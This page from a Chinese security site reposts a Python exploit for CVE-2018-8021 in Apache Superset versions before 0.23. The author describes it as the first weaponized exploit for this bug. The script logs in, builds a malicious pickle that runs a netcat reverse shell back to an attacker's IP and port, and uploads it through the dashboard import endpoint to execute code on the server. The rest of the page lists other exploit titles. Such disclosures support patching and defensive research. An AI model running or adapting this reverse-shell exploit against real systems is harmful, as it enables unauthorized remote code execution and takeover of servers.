首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache Superset 0.23 - Remote Code Execution
来源:david.may@semanticbits.com 作者:David 发布时间:2018-12-04  
# Exploit Title: Apache Superset 0.23 - Remote Code Execution
# Date: 2018-05-17
# Exploit Author: David May (david.may@semanticbits.com)
# Vendor Homepage: https://superset.apache.org/
# Software Link: https://github.com/apache/incubator-superset
# Version: Any before 0.23
# Tested on: Ubuntu 18.04
# CVE-ID: CVE-2018-8021
 
# I originally disclosed this to the Apache Superset team back in May, and the fix had already been
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.
 
#!/usr/bin/env python
 
import sys
import os
from lxml import html
import requests
 
# Change these values to your TCP listener
myIP = '192.168.137.129'
myPort = '8888'
# Credentials must belong to user with 'can Import Dashboards on Superset' privilege
username = 'test'
password = 'test'
 
# Logic in case script arguments are not given
if len(sys.argv) < 3:
    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')
    print('Script Usage:')
    print('./supersetrce.py <superset server ip> <superset port>')
    sys.exit()
    
else:
    # Script arguments
    supersetIP = sys.argv[1]
    supersetPort = sys.argv[2]
    # Verify these URLs match your environment
    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'
    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'
    
    # Checks to see if file that we are going to write already exists in case this is run more than once
    if os.path.isfile('evil.pickle'):
        os.remove('evil.pickle')
        
    # Headers that we append to our POST requests
    headers_dict = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    
    # Creates evil pickle file and writes the reverse shell to it
    evilPickle = open('evil.pickle','w+')
    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')
    evilPickle.close()
    
    # Start a session so we have persistent cookies
    session = requests.session()   
    
    # Grabs the Login page to parse it for its CSRF token
    login_page = session.get(login_URL)
    if login_page.status_code != 200:
        print('Login page not reached, verify URLs in script')
    login_tree = html.fromstring(login_page.content)
    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')
    
    # Form data that is sent in the POST request to Login page
    login_data = {
        'csrf_token' : csrf_token,
        'username' : username,
        'password' : password,
    }
    
    # Adds the Referer header for the login page
    headers_dict['Referer'] = login_URL
    
    # Logon action
    login = session.post(login_URL, headers=headers_dict, data=login_data) 
    
    # Grabs the Upload page to parse it for its CSRF token
    upload_page = session.get(upload_URL)
    if upload_page.status_code != 200:
        print('Upload page not reached, verify credentials and URLs in script')
    upload_tree = html.fromstring(upload_page.content)
    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
    
    # Adds the Referer header for the Upload page
    headers_dict['Referer'] = upload_URL
    
    # Upload action
    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})
    
    # Closes the session
    session.close()
    sys.exit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Mozilla Firefox 63.0.1 - Denia
·NEC Univerge Sv9100 WebPro 6.0
·Joomla! Component JE Photo Gal
·PaloAlto Networks Expedition M
·Fleetco Fleet Maintenance Mana
·CyberArk 9.7 - Memory Disclosu
·Joomla JCE 2.6.33 Arbitrary Fi
·Apache Spark - Unauthenticated
·VBScript - 'rtFilter' Out-of-B
·VBScript - 'OLEAUT32!VariantCl
·xorg-x11-server < 1.20.3 - 'mo
·HTML5 Video Player 1.2.5 - Buf
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved